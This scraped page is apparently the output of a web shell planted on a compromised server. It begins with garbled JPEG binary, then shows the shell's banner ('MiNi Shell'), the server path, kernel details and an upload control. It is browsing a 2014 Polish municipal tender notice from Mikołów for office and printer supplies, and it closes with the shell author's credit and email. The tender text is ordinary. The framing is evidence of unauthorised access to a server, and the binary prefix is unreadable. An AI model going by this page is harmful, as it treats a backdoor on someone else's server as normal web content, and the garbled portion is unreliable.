JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140306/47479-N-2014.html

<p class="kh_header"><b>Mikołów: Dostawa materiałów biurowych i eksploatacyjnych na potrzeby realizacji projektu pn. Akademia Umiejętności dla Gimnazjalistów Mikołowa - etap II</b><br>
<b>Numer ogłoszenia: 47479 - 2014; data zamieszczenia: 06.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołów , Rynek 16, 43-190 Mikołów, woj. śląskie, tel. 32 3248500, faks 32 3248400.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i eksploatacyjnych na potrzeby realizacji projektu pn. Akademia Umiejętności dla Gimnazjalistów Mikołowa - etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych i eksploatacyjnych na potrzeby realizacji projektu 
1. Tusz (wkład): kompatybilny z drukarką atramentową (podano nazwy sprzętu), oryginalny lub jego zamiennik (parametry fizyko-chemiczne  i techniczne nie powinny różnić się jakościowo od oryginalnych materiałów eksploatacyjnych oferowanych przez producentów urządzeń drukujących), fabrycznie zapakowany (patrz również informacje dodatkowe).
Czarny 15 sztuk - Kompatybilny z drukarką HP Deskjet Ink Advantage K209
Kolor 15 sztuk - Kompatybilny z drukarką HP Deskjet Ink Advantage K209
Czarny 5 sztuk -Kompatybilny z drukarkami HP DESKJET F 370
Kolor 5 sztuk - Kompatybilny z drukarkami HP DESKJET F 370
Czarny 3 sztuki - Kompatybilny z drukarką Epson Stylus SX610FW 
Kolor 3 sztuki - Kompatybilny z drukarką Epson Stylus SX610FW (3 różne)
Czarny 1 sztuki - Kompatybilny z drukarką HP Desk Jet 5550
Kolor 1 sztuki - Kompatybilny z drukarką HP Desk Jet 5550
Cyjan 3 sztuki - Kompatybilny z drukarką Canon Pixma iP 3600 CANON SILVER
Magneta 3 sztuki - Kompatybilny z drukarką Canon Pixma iP 3600 CANON SILVER
Zółty 3 sztuki -Kompatybilny z drukarką Canon Pixma iP 3600 CANON SILVER
Czarny 520BK  3 sztuki - Kompatybilny z drukarką Canon Pixma iP 3600 CANON SILVER
Czarny 521BK 3 sztuki - Kompatybilny z drukarką Canon Pixma iP 3600 CANON SILVER
Nie dopuszcza się dostawy tzw. wkładów odzyskanych-regenerowanych (patrz informacje dodatkowe);
2. Toner: kompatybilny z drukarką  laserową (podano nazwy sprzętu), oryginalny lub jego zamiennik (parametry fizyko-chemiczne  i techniczne nie powinny różnić się jakościowo od oryginalnych materiałów eksploatacyjnych oferowanych przez producentów urządzeń drukujących), fabrycznie zapakowany (patrz również informacje dodatkowe).
Czarny 4 sztuki - Kompatybilny z drukarką HP Laser Jet P1106W
Czarny 1 sztuka - Kompatybilny z drukarką Samsung CLP-365W/SEE
Nie dopuszcza się dostawy tzw. wkładów odzyskanych-regenerowanych (patrz informacje dodatkowe);
3. Toner: kompatybilny z kserokopiarką lub urządzeniem wielofunkcyjnym (podano nazwy sprzętu), oryginalny lub jego zamiennik (parametry fizyko-chemiczne  i techniczne nie powinny różnić się jakościowo od oryginalnych materiałów eksploatacyjnych oferowanych przez producentów urządzeń drukujących), fabrycznie zapakowany (patrz również informacje dodatkowe).
Czarny 1 sztuka - Kompatybilny z urządzeniem Canon IR 2520
Czarny 6 sztuka - Kompatybilny z urządzeniem Canon IR 2200
Czarny 1 sztuka - Kompatybilny z urządzeniem Samsung ML2010 P
Nie dopuszcza się dostawy tzw. wkładów odzyskanych-regenerowanych (patrz informacje dodatkowe);
4. Papier ksero: ryza = 500 arkuszy, min. gramatura 80g/m2, do drukowania i kopiowania
Format A4, 20 ryz, Biały;
5. Teczka  konferencyjna: skrzydłowa, wymiar minimalny: dł. 32 x szer. 23 x gł. 3 cm z przeznaczeniem na dokumenty formatu A4, wykonane z mocnego kartonu (tektury) grubości min. 2 mm, zapięcie z rzepu, bez uchwytu, kolorowa oklejka: kolor teczki granatowy, pokryta folią polipropylenową, wyklejka papierowa, kolorowa  treść nadruku: treść i szata graficzna nawiązująca do tematyki projektu, powinna być uzgodniona z Zamawiającym oraz być zgodna z aktualnymi wytycznymi dotyczącymi promocji, oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, projekt nadruku, treść i szata graficzna będzie podlegać akceptacji Zamawiającego.
52 sztuk, nadruk w pełnym kolorze, dopuszczalne jest wykonanie nadruku w formie naklejki pełnokolorowej;
6. Kołonotatnik-format A4, min. 100 kartek w kratkę, w twardej okładce, z możliwością wpięcia długopisu, nadruk: treść i szata graficzna nawiązująca do tematyki projektu, powinna być uzgodniona z Zamawiającym oraz być zgodna z aktualnymi wytycznymi dotyczącymi promocji, oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, projekt nadruku, treść i szata graficzna będzie podlegać akceptacji Zamawiającego.
52 sztuk nadruk w pełnym kolorze, dopuszczalne również jest wykonanie nadruku w kolorze czarnym lub monochromatycznym;
7. Długopisy z nadrukiem- długopis automatyczny z wymiennym wkładem, grubości linii pisania 0,7 mm, obudowa (kolor biały) wykonana z wytrzymałego i estetycznego tworzywa sztucznego umożliwiającego wykonanie nadruku, nadruk: treść i szata graficzna nawiązująca do tematyki projektu, powinna być uzgodniona z Zamawiającym oraz być zgodna z aktualnymi wytycznymi dotyczącymi promocji, oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, projekt nadruku, treść i szata graficzna będzie podlegać akceptacji Zamawiającego. 
52 sztuk nadruku w kolorze czarnym lub monochromatycznym;
8. Linijka z nadrukiem: biurowa plastikowa 20 cm, nadruk: treść i szata graficzna nawiązująca do tematyki projektu, powinna być uzgodniona z Zamawiającym oraz być zgodna z aktualnymi wytycznymi dotyczącymi promocji, oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, projekt nadruku, treść i szata graficzna będzie podlegać akceptacji Zamawiającego
52 sztuk nadruku w kolorze czarnym lub monochromatycznym;
9. Ołówek z nadrukiem: drewniane dł. min. 15 cm, średnica min. 0,5 cm, zatemperowane, nadruk: treść i szata graficzna nawiązująca do tematyki projektu, powinna być uzgodniona z Zamawiającym oraz być zgodna z aktualnymi wytycznymi dotyczącymi promocji, oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, projekt nadruku, treść i szata graficzna będzie podlegać akceptacji Zamawiającego
52 sztuk nadruku w kolorze czarnym lub monochromatycznym.
Informacje dodatkowe (pozycja 1,2,3): materiały eksploatacyjne (tusze, tonery) muszą być fabrycznie nowe (nowo wytworzone w całości tzn. nowa obudowa, nowe dysze, nowy tusz, nowe bębny światłoczułe, nowe oryginalne opakowanie nie noszące znamion otwierania) nie regenerowane (np. nie poddane procesowi powtórnego napełnienia zużytych pojemników), wykonane z pełnowartościowych komponentów, bez śladów uszkodzeń. 
Nie uznaje się za wyrób obejmujący umowę wyrobu eksploatowanego wcześniej, przerobionego, gdzie jedynie wyczyszczony został pojemnik i ponownie napełniony czy uzupełniony. Materiały eksploatacyjne musza być w oryginalnych opakowaniach z podana na opakowaniu nazwą producenta oraz opisem przeznaczenia np.: typami urządzeń, do których materiały eksploatacyjne są przeznaczone.
Dostarczone materiały eksploatacyjne muszą posiadać termin przydatności do użycia nie krótszy niż 6 miesięcy od terminu zdatności do użycia wykazanego na opakowaniu.
Materiały eksploatacyjne wywołujące negatywny wpływ na żywotność urządzeń i ich podzespołów lub odbiegające swoimi parametrami np.: wydajnością, jakością wydruku, itd. zostaną wymienione w ramach gwarancji na nowe materiały wolne od wad.
Wykonawca gwarantuje, że materiały eksploatacyjne dostarczone w ramach realizacji umowy, będą posiadały gwarancję realizowana przez wykonawcę lub producenta.



Szczegółowy opis przedmiotu zamówienia zamieszczono w załączniku Nr A do specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 22.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium  w wysokości: 150,00 zł (słownie: sto pięćdziesiąt złotych) nie później niż do upływu terminu składania ofert, w formach o jakich mowa w art. 45 ust. 6 ustawy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miasta: 
Mikołowski Bank Spółdzielczy w Mikołowie
Nr 65 84360003 0000 0000 0071 0042 
Pozostałe formy wadium, o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy, należy złożyć w oryginale do depozytu w kasie Urzędu Miasta, pokój nr 1, w wysokości stanowiącej równowartość powyższej kwoty, nie później niż do upływu terminu składania ofert. 
Wadium w formie niepieniężnej musi zawierać bezwarunkowe zobowiązanie Gwaranta do zapłaty kwoty gwarancji na pierwsze pisemne żądanie zamawiającego, o ile zaistnieje  którakolwiek z okoliczności wskazanych w art. 46 ust. 4a lub ust. 5 ustawy. W przypadku załączenia oryginału wadium w postaci niepieniężnej do oferty zamawiający uzna, że termin wniesienia wadium został dotrzymany. Zamawiający nie jest zobowiązany do udowodnienia, że nieskuteczność wezwania, o którym mowa w art. 26 ust. 3 cyt. ustawy, wynikła z przyczyn leżących lub nie leżących po stronie wykonawcy.
Za skutecznie wniesione wadium w pieniądzu uważa się wadium znajdujące się /zaksięgowane/ do upływu terminu składania ofert na rachunku Zamawiającego. 
W przypadku uchybienia temu terminowi zamawiający uzna, że wadium nie zostało skutecznie wniesione. W treści przelewu bankowego lub gwarancji należy zamieścić informację o numerze postępowania i nazwie postępowania. O ile wnoszący wadium nie jest podmiotem, który składa ofertę należy w treści przelewu lub gwarancji wskazać na rzecz kogo wadium zostaje wniesione. W przypadku braku możliwości ustalenia, w czyim imieniu zostało wniesione wadium lub jakiego postępowania dotyczy, skutkować to będzie wykluczeniem wykonawcy z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Mikołów, Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 13:00, miejsce: Urząd Mikołów, Rynek 16, 43-190 Mikołów, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki:
Priorytet IX - Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1 - Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.2. - Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com